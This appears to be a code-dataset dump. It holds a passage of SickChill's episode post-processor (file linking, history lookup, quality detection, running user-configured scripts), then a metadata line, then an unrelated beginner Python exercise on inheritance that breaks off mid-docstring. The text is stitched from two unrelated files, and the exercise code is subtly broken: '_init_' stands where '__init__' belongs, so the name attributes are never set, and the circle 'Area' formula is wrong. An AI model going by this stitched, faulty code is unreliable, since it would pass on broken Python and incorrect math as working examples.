_int_move_and_sym_link(cur_file_path, new_file_path):\n self._log(\n _(\"Moving then symbolically linking file from {cur_file_path} to {new_file_path}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path\n ),\n logger.DEBUG,\n )\n try:\n helpers.moveAndSymlinkFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_move_and_sym_link, subtitles=subtitles)\n\n def _symlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n symlink destination to source location, and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to create a symbolic link to\n :param new_base_name: The base filename (no extension) to use during the link. 
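The link is created at the destination and points back to the original file, which stays in place.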
Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_sym_link(cur_file_path, new_file_path):\n self._log(\n _(\"Creating then symbolically linking file from {new_file_path} to {cur_file_path}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path\n ),\n logger.DEBUG,\n )\n try:\n os.symlink(cur_file_path, new_file_path)\n helpers.chmodAsParent(cur_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_sym_link, subtitles=subtitles)\n\n def _history_lookup(self):\n \"\"\"\n Look up the NZB name in the history and see if it contains a record for self.release\n\n :return: A (indexer_id, season, [], quality, version) tuple. The first two may be None if none were found.\n \"\"\"\n\n to_return = (None, None, [], None, None)\n\n # if we don't have either of these then there's nothing to use to search the history for anyway\n if not self.release_name and not self.folder_name:\n self.in_history = False\n return to_return\n\n # make a list of possible names to use in the search\n names = []\n if self.release_name:\n names.append(self.release_name)\n no_extension = remove_extension(self.release_name)\n if no_extension not in names:\n names.append(no_extension)\n if self.folder_name:\n names.append(self.folder_name)\n\n # search the database for a possible match and return immediately if we find one\n main_db_con = db.DBConnection()\n for curName in names:\n search_name = re.sub(r\"[\\.\\- ]\", \"_\", curName)\n sql_results = main_db_con.select(\n \"SELECT showid, season, quality, version, resource FROM history WHERE resource LIKE ? 
AND (action % 100 = 4 OR action % 100 = 6)\", [search_name]\n )\n\n if not sql_results:\n continue\n\n indexer_id = int(sql_results[0][\"showid\"])\n season = int(sql_results[0][\"season\"])\n quality = int(sql_results[0][\"quality\"])\n version = int(sql_results[0][\"version\"])\n\n if quality == common.Quality.UNKNOWN:\n quality = None\n\n show = Show.find(settings.showList, indexer_id)\n\n self.in_history = True\n self.version = version\n to_return = (show, season, [], quality, version)\n\n qual_str = common.Quality.qualityStrings[quality] if quality is not None else quality\n result_name = show.name if show else \"UNDEFINED\"\n self._log(\n _(\"Found result in history for {result_name} - Season: {season} - Quality: {qual_str} - Version: {version}\").format(\n result_name=result_name, season=season, qual_str=qual_str, version=version\n ),\n logger.DEBUG,\n )\n\n return to_return\n\n self.in_history = False\n return to_return\n\n def _finalize(self, parse_result):\n \"\"\"\n Store parse result if it is complete and final\n\n :param parse_result: Result of parsers\n \"\"\"\n self.release_group = parse_result.release_group\n\n # remember whether it's a proper\n if parse_result.extra_info:\n self.is_proper = re.search(r\"\\b(proper|repack|real)\\b\", parse_result.extra_info, re.I) is not None\n\n # if the result is complete then remember that for later\n # if the result is complete then set release name\n if (\n parse_result.series_name\n and ((parse_result.season_number is not None and parse_result.episode_numbers) or parse_result.air_date)\n and parse_result.release_group\n ):\n if not self.release_name:\n self.release_name = helpers.remove_non_release_groups(remove_extension(os.path.basename(parse_result.original_name)))\n\n else:\n logger.debug(\"Parse result not sufficient (all following have to be set). will not save release name\")\n logger.debug(f\"Parse result(series_name): {parse_result.series_name}\")\n logger.debug(f\"Parse result(season_number): {parse_result.season_number}\")\n logger.debug(f\"Parse result(episode_numbers): {parse_result.episode_numbers}\")\n logger.debug(f\" or Parse result(air_date): {parse_result.air_date}\")\n logger.debug(f\"Parse result(release_group): {parse_result.release_group}\")\n\n def _analyze_name(self, name):\n \"\"\"\n Takes a name and tries to figure out a show, season, and episode from it.\n\n :param name: A string which we want to analyze to determine show info from (str)\n\n :return: A (indexer_id, season, [episodes]) tuple. 
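For example (hypothetical name), 'Some.Show.S02E03.720p.HDTV.x264-GRP' should resolve to the matching show object with season 2 and episodes [3].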
The first two may be None and episodes may be []\n if none were found.\n \"\"\"\n\n to_return = (None, None, [], None, None)\n\n if not name:\n return to_return\n\n logger.debug(f\"Analyzing name {name}\")\n\n name = helpers.remove_non_release_groups(remove_extension(name))\n\n parse_result = guessit_findit(name)\n if not parse_result:\n return to_return\n\n # show object\n show = parse_result.show\n\n if parse_result.is_air_by_date:\n season = -1\n episodes = [parse_result.air_date]\n else:\n season = parse_result.season_number\n episodes = parse_result.episode_numbers\n\n to_return = (show, season, episodes, parse_result.quality, None)\n\n self._finalize(parse_result)\n return to_return\n\n @staticmethod\n def _build_anidb_episode(connection, filePath):\n \"\"\"\n Look up anidb properties for an episode\n\n :param connection: anidb connection handler\n :param filePath: file to check\n :return: episode object\n \"\"\"\n ep = adba.Episode(\n connection,\n file_path=Path(filePath),\n paramsF=[\"quality\", \"anidb_file_name\", \"crc32\"],\n paramsA=[\"epno\", \"english_name\", \"short_name_list\", \"other_name\", \"synonym_list\"],\n )\n\n return ep\n\n def _add_to_anidb_mylist(self, filePath):\n \"\"\"\n Adds an episode to anidb mylist\n\n :param filePath: file to add to mylist\n \"\"\"\n if helpers.set_up_anidb_connection():\n if not self.anidbEpisode: # seems like we could parse the name before, now lets build the anidb object\n self.anidbEpisode = self._build_anidb_episode(settings.ADBA_CONNECTION, filePath)\n\n self._log(_(\"Adding the file to the anidb mylist\"), logger.DEBUG)\n try:\n self.anidbEpisode.add_to_mylist(status=1) # status = 1 sets the status of the file to \"internal HDD\"\n except Exception as error:\n self._log(f\"exception msg: {error}\")\n\n def _find_info(self):\n \"\"\"\n For a given file try to find the showid, season, and episode.\n\n :return: A (show, season, episodes, quality, version) tuple\n \"\"\"\n\n show = season = quality = version = None\n episodes = []\n\n # try to look up the release in history\n attempt_list = [\n self._history_lookup,\n # try to analyze the release name\n lambda: self._analyze_name(self.release_name),\n # try to analyze the file name\n lambda: self._analyze_name(self.filename),\n # try to analyze the dir name\n lambda: self._analyze_name(self.folder_name),\n # try to analyze the file + dir names together\n lambda: self._analyze_name(self.directory),\n # try to analyze the dir + file name together as one name\n lambda: self._analyze_name(f\"{self.folder_name} {self.filename}\"),\n ]\n\n # attempt every possible method to get our info\n for cur_attempt in attempt_list:\n try:\n cur_show, cur_season, cur_episodes, cur_quality, cur_version = cur_attempt()\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"{error}\")\n continue\n\n if not cur_show:\n continue\n else:\n show = cur_show\n\n if cur_quality and not (self.in_history and quality):\n quality = cur_quality\n\n # we only get current version for animes from history to prevent issues with old database entries\n if cur_version is not None:\n version = cur_version\n\n if cur_season is not None:\n season = cur_season\n if cur_episodes:\n episodes = cur_episodes\n\n # for air-by-date shows we need to look up the season/episode from database\n if season == -1 and show and episodes:\n self._log(\"Looks like this is an air-by-date or sports show, attempting to convert the date to season/episode\", logger.DEBUG)\n\n try:\n airdate = episodes[0].toordinal()\n 
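# A value without toordinal() is not a date object, so this was not an air-by-date name after all.\n            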
except AttributeError:\n airdate_value = episodes[0]\n self._log(_(\"Could not convert to a valid airdate: {airdate_value}\").format(airdate_value=airdate_value), logger.DEBUG)\n episodes = []\n continue\n\n main_db_con = db.DBConnection()\n # Ignore season 0 when searching for episode(Conflict between special and regular episode, same air date)\n sql_result = main_db_con.select(\n \"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ? and season != 0\",\n [show.indexerid, show.indexer, airdate],\n )\n\n if sql_result:\n season = int(sql_result[0][\"season\"])\n episodes = [int(sql_result[0][\"episode\"])]\n else:\n # Found no result, try with season 0\n sql_result = main_db_con.select(\n \"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ?\", [show.indexerid, show.indexer, airdate]\n )\n if sql_result:\n season = int(sql_result[0][\"season\"])\n episodes = [int(sql_result[0][\"episode\"])]\n else:\n self._log(f\"Unable to find episode with date {episodes[0]} for show {show.indexerid}, skipping\", logger.DEBUG)\n # we don't want to leave dates in the episode list if we couldn't convert them to real episode numbers\n episodes = []\n continue\n\n # if there's no season then we can hopefully just use 1 automatically\n elif season is None and show:\n main_db_con = db.DBConnection()\n numseasonsSQlResult = main_db_con.select(\n \"SELECT COUNT(DISTINCT season) FROM tv_episodes WHERE showid = ? and indexer = ? and season != 0\", [show.indexerid, show.indexer]\n )\n if int(numseasonsSQlResult[0][0]) == 1 and season is None:\n self._log(_(\"Don't have a season number, but this show appears to only have 1 season, setting season number to 1...\"), logger.DEBUG)\n season = 1\n\n if show and season and episodes:\n return show, season, episodes, quality, version\n\n return show, season, episodes, quality, version\n\n def _get_ep_obj(self, show, season, episodes):\n \"\"\"\n Retrieve the TVEpisode object requested.\n\n :param show: The show object belonging to the show we want to process\n :param season: The season of the episode (int)\n :param episodes: A list of episodes to find (list of ints)\n\n :return: If the episode(s) can be found then a TVEpisode object with the correct related eps will\n be instantiated and returned. 
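For example (hypothetical), season=1 with episodes=[1, 2] returns the 1x01 episode object and attaches 1x02 through its relatedEps list.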
If the episode can't be found then None will be returned.\n \"\"\"\n\n root_ep = None\n for cur_episode in episodes:\n self._log(f\"Retrieving episode object for {episode_num(season, cur_episode)}\", logger.DEBUG)\n\n # now that we've figured out which episode this file is just load it manually\n try:\n curEp = show.getEpisode(season, cur_episode)\n if not curEp:\n raise EpisodeNotFoundException()\n except EpisodeNotFoundException as error:\n self._log(_(\"Unable to create episode: {error}\").format(error=error), logger.DEBUG)\n raise EpisodePostProcessingFailedException()\n\n # associate all the episodes together under a single root episode\n if root_ep is None:\n root_ep = curEp\n root_ep.relatedEps = []\n elif curEp not in root_ep.relatedEps:\n root_ep.relatedEps.append(curEp)\n\n return root_ep\n\n def _get_quality(self, ep_obj):\n \"\"\"\n Determines the quality of the file that is being post processed, first by checking if it is directly\n available in the TVEpisode's status or otherwise by parsing through the data available.\n\n :param ep_obj: The TVEpisode object related to the file we are post processing\n :return: A quality value found in common.Quality\n \"\"\"\n\n # if there is a quality available in the status then we don't need to bother guessing from the filename\n if ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n ep_status_, ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n if ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"The old status had a quality in it, using that: \") + common.Quality.qualityStrings[ep_quality], logger.DEBUG)\n return ep_quality\n\n # release name is the most reliable if it exists, followed by folder name and lastly file name\n name_list = [self.release_name, self.folder_name, self.filename]\n\n # search all possible names for our new quality, in case the file or dir doesn't have it\n for cur_name in name_list:\n # some stuff might be None at this point still\n if not cur_name:\n continue\n\n ep_quality = common.Quality.nameQuality(cur_name, ep_obj.show.is_anime)\n self._log(f\"Looking up quality for name {cur_name}, got {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n\n # if we find a good one then use it\n if ep_quality != common.Quality.UNKNOWN:\n logger.debug(f\"{cur_name} looks like it has quality {common.Quality.qualityStrings[ep_quality]}, using that\")\n return ep_quality\n\n # Try getting quality from the episode (snatched) status\n if ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n ep_status_, ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n if ep_quality != common.Quality.UNKNOWN:\n self._log(f\"The old status had a quality in it, using that: {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n return ep_quality\n\n # Try guessing quality from the file name\n ep_quality = common.Quality.nameQuality(self.directory)\n self._log(f\"Guessing quality for name {self.filename}, got {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n if ep_quality != common.Quality.UNKNOWN:\n logger.debug(f\"{self.filename} looks like it has quality {common.Quality.qualityStrings[ep_quality]}, using that\")\n return ep_quality\n\n return ep_quality\n\n def _run_extra_scripts(self, ep_obj):\n \"\"\"\n Executes any extra scripts defined in the config.\n\n :param ep_obj: The object to use when calling the extra script\n \"\"\"\n\n if not settings.EXTRA_SCRIPTS:\n return\n\n 
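# Each entry is split shell-style below so quoted script paths stay intact, then invoked with\n        # six extra arguments: episode location, processed file path, indexer id, season, episode, airdate.\n        # Hypothetical example entry: python /opt/scripts/notify.py\n        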
for curScriptName in settings.EXTRA_SCRIPTS:\n # generate a safe command line string to execute the script and provide all the parameters\n script_cmd = [piece for piece in re.split(r'(\\'.*?\\'|\".*?\"| )', curScriptName) if piece.strip()]\n script_cmd[0] = os.path.abspath(script_cmd[0])\n self._log(f\"Absolute path to script: {script_cmd[0]}\", logger.DEBUG)\n\n script_cmd += [ep_obj._location, self.directory, str(ep_obj.show.indexerid), str(ep_obj.season), str(ep_obj.episode), str(ep_obj.airdate)]\n\n # use subprocess to run the command and capture output\n self._log(f\"Executing command: {script_cmd}\")\n try:\n p = subprocess.Popen(\n script_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=settings.DATA_DIR, universal_newlines=True\n )\n out, err = p.communicate()\n\n self._log(_(\"Script result: {out}\").format(out=(out or err).strip()), logger.DEBUG)\n\n except Exception as error:\n self._log(f\"Unable to run extra_script: {error}\")\n\n def _is_priority(self, ep_obj, new_ep_quality):\n \"\"\"\n Determines if the episode is a priority download or not (if it is expected). Episodes which are expected\n (snatched) or larger than the existing episode are priority, others are not.\n\n :param ep_obj: The TVEpisode object in question\n :param new_ep_quality: The quality of the episode that is being processed\n :return: True if the episode is priority, False otherwise.\n \"\"\"\n\n if self.is_priority:\n return True\n\n old_ep_status_, old_ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n\n # if SC downloaded this on purpose we likely have a priority download\n if self.in_history or ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n # if the episode is still in a snatched status, then we can assume we want this\n if not self.in_history:\n self._log(\"SC snatched this episode and it is not processed before\", logger.DEBUG)\n return True\n\n # if it's in history, we only want it if the new quality is higher or if it's a proper of equal or higher quality\n if new_ep_quality > old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(\"SC snatched this episode and it is a higher quality so I'm marking it as priority\", logger.DEBUG)\n return True\n\n if self.is_proper and new_ep_quality >= old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"SC snatched this episode and it is a proper of equal or higher quality so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n return False\n\n # if the user downloaded it manually and it's higher quality than the existing episode then it's priority\n if new_ep_quality > old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"This was manually downloaded but it appears to be better quality than what we have so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n # if the user downloaded it manually and it appears to be a PROPER/REPACK then it's priority\n if self.is_proper and new_ep_quality >= old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"This was manually downloaded but it appears to be a proper so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n return False\n\n def process(self):\n \"\"\"\n Post-process a given file\n\n :return: True on success, False on failure\n \"\"\"\n\n self._log(_(\"Processing {directory} ({release_name})\").format(directory=self.directory, release_name=self.release_name))\n\n if 
os.path.isdir(self.directory):\n self._log(_(\"File {directory} seems to be a directory\").format(directory=self.directory))\n return False\n\n if not os.path.exists(self.directory):\n self._log(_(\"File {directory} doesn't exist, did unrar fail?\").format(directory=self.directory))\n return False\n\n for ignore_file in self.IGNORED_FILESTRINGS:\n if ignore_file in self.directory:\n self._log(_(\"File {directory} is ignored type, skipping\").format(directory=self.directory))\n return False\n\n # reset per-file stuff\n self.in_history = False\n\n # reset the anidb episode object\n self.anidbEpisode = None\n\n # try to find the file info\n (show, season, episodes, quality, version) = self._find_info()\n if not show:\n self._log(_(\"This show isn't in your list, you need to add it to SC before post-processing an episode\"))\n raise EpisodePostProcessingFailedException()\n elif season is None or not episodes:\n self._log(_(\"Not enough information to determine what episode this is. Quitting post-processing\"))\n return False\n\n # retrieve/create the corresponding TVEpisode objects\n ep_obj = self._get_ep_obj(show, season, episodes)\n old_ep_status_, old_ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n\n # get the quality of the episode we're processing\n if quality and not common.Quality.qualityStrings[quality] == \"Unknown\":\n self._log(_(\"Snatch history had a quality in it, using that: \") + common.Quality.qualityStrings[quality], logger.DEBUG)\n new_ep_quality = quality\n else:\n new_ep_quality = self._get_quality(ep_obj)\n\n new_quality_string = common.Quality.qualityStrings[new_ep_quality]\n logger.debug(_(\"Quality of the episode we're processing: {new_quality_string}\").format(new_quality_string=new_quality_string))\n\n # see if this is a priority download (is it snatched, in history, PROPER, or BEST)\n priority_download = self._is_priority(ep_obj, new_ep_quality)\n self._log(_(\"Is ep a priority download: \") + str(priority_download), logger.DEBUG)\n\n # get the version of the episode we're processing\n if version:\n self._log(_(\"Snatch history had a version in it, using that: v\") + str(version), logger.DEBUG)\n new_ep_version = version\n else:\n new_ep_version = -1\n\n # check for an existing file\n existing_file_status = self._checkForExistingFile(ep_obj.location)\n\n if not priority_download:\n if existing_file_status == PostProcessor.EXISTS_SAME:\n self._log(\"File exists and new file is same size, pretending we did something\")\n return True\n\n if new_ep_quality <= old_ep_quality != common.Quality.UNKNOWN and existing_file_status != PostProcessor.DOESNT_EXIST:\n if self.is_proper and new_ep_quality == old_ep_quality:\n self._log(_(\"New file is a proper/repack, marking it safe to replace\"))\n else:\n allowed_qualities_, preferred_qualities = common.Quality.splitQuality(int(show.quality))\n if new_ep_quality not in preferred_qualities:\n self._log(_(\"File exists and new file quality is not in a preferred quality list, marking it unsafe to replace\"))\n return False\n\n # Check if the processed file season is already in our indexer. If not, the file is most probably mislabled/fake and will be skipped\n # Only proceed if the file season is > 0\n if int(ep_obj.season) > 0:\n main_db_con = db.DBConnection()\n max_season = main_db_con.select(\"SELECT MAX(season) FROM tv_episodes WHERE showid = ? 
and indexer = ?\", [show.indexerid, show.indexer])\n\n if not isinstance(max_season[0][0], int) or max_season[0][0] < 0:\n self._log(\n f\"File has season {ep_obj.season}, while the database does not have any known seasons yet. \"\n \"Try forcing a full update on the show and process this file again. \"\n \"The file may be incorrectly labeled or fake, aborting.\"\n )\n return False\n\n # If the file season (ep_obj.season) is bigger than the indexer season (max_season[0][0]), skip the file\n newest_season_num = max_season[0][0]\n episode_season = ep_obj.season\n if int(episode_season) > newest_season_num:\n self._log(\n _(\n \"File has season {episode_season}, while the indexer is on season {newest_season_num}. \"\n \"Try forcing a full update on the show and process this file again. \"\n \"The file may be incorrectly labeled or fake, aborting.\"\n ).format(episode_season=episode_season, newest_season_num=newest_season_num)\n )\n return False\n\n # if the file is priority then we're going to replace it even if it exists\n else:\n self._log(_(\"This download is marked a priority download so I'm going to replace an existing file if I find one\"))\n\n # try to find out if we have enough space to perform the copy or move action.\n if settings.USE_FREE_SPACE_CHECK:\n if not helpers.is_file_locked(self.directory):\n if not verify_freespace(self.directory, ep_obj.show._location, [ep_obj] + ep_obj.relatedEps, method=self.process_method):\n self._log(_(\"Not enough disk space to continue processing, exiting\"), logger.WARNING)\n return False\n else:\n self._log(_(\"Unable to determine needed file space as the source file is locked for access\"))\n\n # delete the existing file (and company)\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n try:\n self._delete(cur_ep.location, associated_files=True)\n\n # clean up any left over folders\n if cur_ep.location:\n helpers.delete_empty_folders(os.path.dirname(cur_ep.location), keep_dir=ep_obj.show._location)\n\n # clean up download-related properties\n cur_ep.cleanup_download_properties()\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to delete the existing files\"))\n\n # set the status of the episodes\n # for curEp in [ep_obj] + ep_obj.relatedEps:\n # curEp.status = common.Quality.compositeStatus(common.SNATCHED, new_ep_quality)\n\n # if the show directory doesn't exist then make it if allowed\n if not os.path.isdir(ep_obj.show._location) and settings.CREATE_MISSING_SHOW_DIRS:\n self._log(_(\"Show directory doesn't exist, creating it\"), logger.DEBUG)\n try:\n os.mkdir(ep_obj.show._location)\n helpers.chmodAsParent(ep_obj.show._location)\n\n # do the library update for synoindex\n notifiers.synoindex_notifier.addFolder(ep_obj.show._location)\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to create the show directory: \") + ep_obj.show._location)\n\n # get metadata for the show (but not episode because it hasn't been fully processed)\n ep_obj.show.writeMetadata(True)\n\n # update the ep info before we rename so the quality & release name go into the name properly\n sql_l = []\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n with cur_ep.lock:\n if self.release_name:\n self._log(_(\"Found release name \") + self.release_name, logger.DEBUG)\n cur_ep.release_name = self.release_name\n elif self.filename:\n # If we can't get the release name we expect, save the original release name instead\n self._log(_(\"Using original release name \") + self.filename, logger.DEBUG)\n 
cur_ep.release_name = self.filename\n else:\n cur_ep.release_name = \"\"\n\n cur_ep.status = common.Quality.compositeStatus(common.DOWNLOADED, new_ep_quality)\n\n cur_ep.subtitles = \"\"\n\n cur_ep.subtitles_searchcount = 0\n\n cur_ep.subtitles_lastsearch = \"0001-01-01 00:00:00\"\n\n cur_ep.is_proper = self.is_proper\n\n cur_ep.version = new_ep_version\n\n if self.release_group:\n cur_ep.release_group = self.release_group\n else:\n cur_ep.release_group = \"\"\n\n sql_l.append(cur_ep.get_sql())\n\n # Just want to keep this consistent for failed handling right now\n releaseName = show_name_helpers.determine_release_name(self.folder_path, self.release_name)\n if releaseName:\n self.history.logSuccess(releaseName)\n else:\n self._log(_(\"Warning: Couldn't find release in snatch history\"), logger.INFO)\n\n # find the destination folder\n try:\n proper_path = ep_obj.proper_path()\n proper_absolute_path = os.path.join(ep_obj.show.location, proper_path)\n\n dest_path = os.path.dirname(proper_absolute_path)\n except ShowDirectoryNotFoundException:\n raise EpisodePostProcessingFailedException(_(\"Unable to post-process an episode if the show dir doesn't exist, quitting\"))\n\n self._log(_(\"Destination folder for this episode: \") + dest_path, logger.DEBUG)\n\n # create any folders we need\n helpers.make_dirs(dest_path)\n\n # figure out the base name of the resulting episode file\n if settings.RENAME_EPISODES:\n old_path = Path(self.filename)\n orig_extension = old_path.suffix\n new_base_name = os.path.basename(proper_path)\n new_filename = f\"{new_base_name}{orig_extension}\"\n else:\n # if we're not renaming then there's no new base name, we'll just use the existing name\n new_base_name = None\n new_filename = self.filename\n\n # add to anidb\n if ep_obj.show.is_anime and settings.ANIDB_USE_MYLIST:\n self._add_to_anidb_mylist(self.directory)\n\n try:\n # move the episode and associated files to the show dir\n if self.process_method == METHOD_COPY:\n if helpers.is_file_locked(self.directory):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading\"))\n self._copy(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_MOVE:\n if helpers.is_file_locked(self.directory, True):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading/writing\"))\n self._move(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_HARDLINK:\n self._hardlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_SYMLINK:\n if helpers.is_file_locked(self.directory, True):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading/writing\"))\n self._moveAndSymlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_SYMLINK_REVERSED:\n self._symlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n else:\n logger.exception(_(\"Unknown process method: \") + str(self.process_method))\n raise EpisodePostProcessingFailedException(_(\"Unable to move the files to their new home\"))\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to move the 
files to their new home\"))\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n with cur_ep.lock:\n cur_ep.location = os.path.join(dest_path, new_filename)\n # download subtitles\n if settings.USE_SUBTITLES and ep_obj.show.subtitles and (cur_ep.season != 0 or settings.SUBTITLES_INCLUDE_SPECIALS):\n cur_ep.refreshSubtitles()\n cur_ep.download_subtitles(force=True)\n sql_l.append(cur_ep.get_sql())\n\n # now that processing has finished, we can put the info in the DB. If we do it earlier, then when processing fails, it won't try again.\n if sql_l:\n main_db_con = db.DBConnection()\n main_db_con.mass_action(sql_l)\n\n ep_obj.airdateModifyStamp()\n\n if settings.USE_ICACLS and os.name == \"nt\":\n os.popen('icacls \"' + ep_obj._location + '\"* /reset /T')\n\n # generate nfo/tbn\n try:\n ep_obj.createMetaFiles()\n except Exception:\n logger.info(_(\"Could not create/update meta files. Continuing with postProcessing...\"))\n\n # log it to history\n self.history.logDownload(ep_obj, self.directory, new_ep_quality, self.release_group, new_ep_version)\n\n # If any notification fails, don't stop postProcessor\n try:\n # send notifications\n notifiers.notify_download(ep_obj._format_pattern(\"%SN - %Sx%0E - %EN - %QN\"))\n\n # do the library update for KODI\n notifiers.kodi_notifier.update_library(ep_obj.show.name)\n\n # do the library update for Plex\n notifiers.plex_notifier.update_library(ep_obj)\n\n # do the library update for EMBY\n notifiers.emby_notifier.update_library(ep_obj.show)\n\n # do the library update for NMJ\n # nmj_notifier kicks off its library update when the notify_download is issued (inside notifiers)\n\n # do the library update for Synology Indexer\n notifiers.synoindex_notifier.addFile(ep_obj.location)\n\n # do the library update for pyTivo\n notifiers.pytivo_notifier.update_library(ep_obj)\n\n # do the library update for Trakt\n notifiers.trakt_notifier.update_library(ep_obj)\n except Exception:\n logger.info(_(\"Some notifications could not be sent. Continuing with postProcessing...\"))\n\n self._run_extra_scripts(ep_obj)\n\n # If any notification fails, don't stop postProcessor\n try:\n # send notifications\n notifiers.email_notifier.notify_postprocess(ep_obj._format_pattern(\"%SN - %Sx%0E - %EN - %QN\"))\n except Exception:\n logger.info(_(\"Some notifications could not be sent. Finishing postProcessing...\"))\n\n return True\n\n\ndef guessit_findit(name: str) -> Union[\"ParseResult\", None]:\n logger.debug(f\"Trying a new way to verify if we can parse this file\")\n title = guessit(name, {\"type\": \"episode\"}).get(\"title\")\n if title:\n show: \"TVShow\" = helpers.get_show(title, False)\n if show:\n try:\n np = NameParser(showObj=show).parse(name, cache_result=False)\n return np\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"Sorry, guessit failed to parse the file name for {show}: {name} (Error: {error} ... 
continuing with the old way\")\n try:\n np = NameParser().parse(name, cache_result=False)\n return np\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"Could not properly parse a show and episode from [{name}]: {error}\")\n\n return None\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/postProcessor.py","file_name":"postProcessor.py","file_ext":"py","file_size_in_byte":57764,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"38683954699","text":"from fpdf import FPDF\nfrom tkinter import messagebox, filedialog\nimport tkinter as tk\nfrom abc import ABC, abstractmethod\n\n\nclass Vehicle:\n def __init__(self, brand, color):\n self.brand = brand\n self.color = color\n\n def __show(self):\n print(\"I am SuperClass\")\n\n\nclass car(Vehicle):\n def __init__(self, brand, color, num_wheels):\n super().__init__(brand, color)\n self.num_wheels = num_wheels\n\n def display_info(self):\n print(\"I am subclass\")\n\n\nmycar = car(\"Honda\", \"Brown\", 4)\n\nmycar._Vehicle__show()\n\n# I did Polymorphism with this next example\n# Exercise\n\n\nclass Shape:\n def display(self):\n print(\"I am SUperclass\")\n\n\nclass Rectangle(Shape):\n def __init__(self, lside, s_side):\n self.lside = lside\n self.s_side = s_side\n\n def rperimeter(self):\n Perimeter = (2 * self.lside) + (2 * self.s_side)\n print(\"Perimeter of Rect:\", Perimeter)\n\n def display(self):\n print(\"I am 1st subclass\")\n\n\nR1 = Rectangle(7, 4)\n# R1.rperimeter()\n\n\nclass Circle(Shape):\n def __init__(self, radius):\n self.radius = radius\n\n def Area(self):\n area = 2 * 3.14 * (self.radius * self.radius)\n print(\"The Area:\", area)\n\n def display(self):\n print(\"I am 2nd subclass\")\n\n\nC1 = Circle(10)\nrmp = Shape()\n\n\ndef copy(Shape):\n Shape.display()\n\n\ncopy(C1)\ncopy(R1)\n\n# C1.Area()\n# multiple inheritance\n\n\nclass Animal:\n def _init_(self, name):\n self.name = name\n\n def eat(self):\n print(f\"{self.name} is eating.\")\n\n def sleep(self):\n print(f\"{self.name} is sleeping.\")\n\n\nclass Dom(Animal):\n def _init_(self, name):\n super()._init_(name)\n\n def eat_plants(self):\n print(f\"{self.name} lives at home.\")\n\n\nclass wild(Animal):\n def _init_(self, name):\n super()._init_(name)\n\n def eat_meat(self):\n print(f\"{self.name} lives in the bush.\")\n\n\n# eagle = wild(\"Eagle\")\n# eagle.eat()\n\n# \"Method overridding\"\n\"\"\"\n Method overriding occurs when a subclass provides its own \n implementation of a method that is already defined in its superclass.\n This allows objects of different classes to have different behaviors \n while being treated uniformly based on their common 